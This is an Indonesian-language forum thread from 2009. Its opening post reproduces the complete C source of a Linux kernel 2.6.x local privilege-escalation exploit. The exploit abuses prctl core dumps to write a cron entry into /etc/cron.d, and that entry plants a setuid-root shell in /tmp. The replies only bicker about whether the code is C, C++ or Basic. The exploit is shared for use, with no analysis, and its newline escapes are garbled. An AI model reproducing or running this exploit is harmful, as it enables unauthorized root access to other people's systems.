ini source kode for linux

Topik sebelumnya Topik selanjutnya Go down

Re: ini source kode for linux

Post  syafmovic007 on Sun Mar 15, 2009 3:38 am

arip wrote:buat si Cs yang kasar !!!!
mas tolong kalau di forum jangan kasar, apalagi sombong, kalau salah akui saja.
omong2 tentang code mas,
saya jadi bingung nih ????
itu program c++ atau c atau c#
kalau c biasanya pakai "void main"
kalau c++ harus pakai "int main"
tidak boleh yang lain
kalau c# saya tidak pernah tahu,
mungkin mas bisa memberi pencerahan ????
" KITA DISINI UNTUK BERBAGI ILMU BUKAN UNTUK MENCARI MUSUH "


kan udah ditulis..................................... lol! lol! lol!
avatar
syafmovic007
Pejuang
Pejuang

Jumlah posting : 63
Age : 26
Lokasi : ~#root | system32
Registration date : 25.02.09

Lihat profil user http://syafmovic007.blogspot.com

Kembali Ke Atas Go down

c atau c++ atau c sharp

Post  arip on Sun Mar 15, 2009 2:35 am

buat si Cs yang kasar !!!!
mas tolong kalau di forum jangan kasar, apalagi sombong, kalau salah akui saja.
omong2 tentang code mas,
saya jadi bingung nih ????
itu program c++ atau c atau c#
kalau c biasanya pakai "void main"
kalau c++ harus pakai "int main"
tidak boleh yang lain
kalau c# saya tidak pernah tahu,
mungkin mas bisa memberi pencerahan ????
" KITA DISINI UNTUK BERBAGI ILMU BUKAN UNTUK MENCARI MUSUH "
avatar
arip
Pejuang
Pejuang

Jumlah posting : 36
Registration date : 05.03.09

Lihat profil user

Kembali Ke Atas Go down

bagaimana...............sih!!

Post  syafmovic007 on Sat Mar 14, 2009 7:23 pm

Emang gak baca tulisan itu........
berarti kamu meremehkan tulisan itu.....................
gak malu ya Embarassed Embarassed

dasar.......... baca dengan teliti dulu... lol! lol! lol! lol!
avatar
syafmovic007
Pejuang
Pejuang

Jumlah posting : 63
Age : 26
Lokasi : ~#root | system32
Registration date : 25.02.09

Lihat profil user http://syafmovic007.blogspot.com

Kembali Ke Atas Go down

betulkah itu ????

Post  siti maysaroh on Sat Mar 14, 2009 1:13 pm

mas itu code c++ campur aduk bagaimana ????
emang bisa code itu dicampur?????
kalau bisa coba berikan contoh sederhana code yang dicampur aduk !!!

siti maysaroh
Pemula
Pemula

Jumlah posting : 14
Registration date : 08.03.09

Lihat profil user

Kembali Ke Atas Go down

Re: ini source kode for linux

Post  syafmovic007 on Wed Mar 11, 2009 1:16 am

zz wrote:Buat Cs
source codenya itu basic apa c/c++ ?


isyaallah itu C++ campur aduk
avatar
syafmovic007
Pejuang
Pejuang

Jumlah posting : 63
Age : 26
Lokasi : ~#root | system32
Registration date : 25.02.09

Lihat profil user http://syafmovic007.blogspot.com

Kembali Ke Atas Go down

Apakah source code ini Basic ?

Post  zz on Tue Mar 10, 2009 10:21 pm

Buat Cs
source codenya itu basic apa c/c++ ?
avatar
zz
Panglima
Panglima

Jumlah posting : 121
Age : 72
Lokasi : france
Registration date : 13.02.09

Lihat profil user

Kembali Ke Atas Go down

ini source kode for linux

Post  syafmovic007 on Tue Mar 10, 2009 12:53 pm

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="nSHELL=/bin/shnPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/coren";

int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00tn");
printf("By: dreyer & RoMaNSoFtn");
printf("[ 10.Jul.2006 ]nn");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("[*] Creating Cron entryn");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("[*] Sleeping for aprox. one minute (** please wait **)n");
sleep(62);

printf("[*] Running shell (remember to remove /tmp/sh when finished) ...n");
system("/tmp/sh -i");


Memakai program basic C


Terakhir diubah oleh Cs tanggal Sat Mar 14, 2009 7:18 pm, total 1 kali diubah
avatar
syafmovic007
Pejuang
Pejuang

Jumlah posting : 63
Age : 26
Lokasi : ~#root | system32
Registration date : 25.02.09

Lihat profil user http://syafmovic007.blogspot.com

Kembali Ke Atas Go down

Re: ini source kode for linux

Post  Sponsored content


Sponsored content


Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik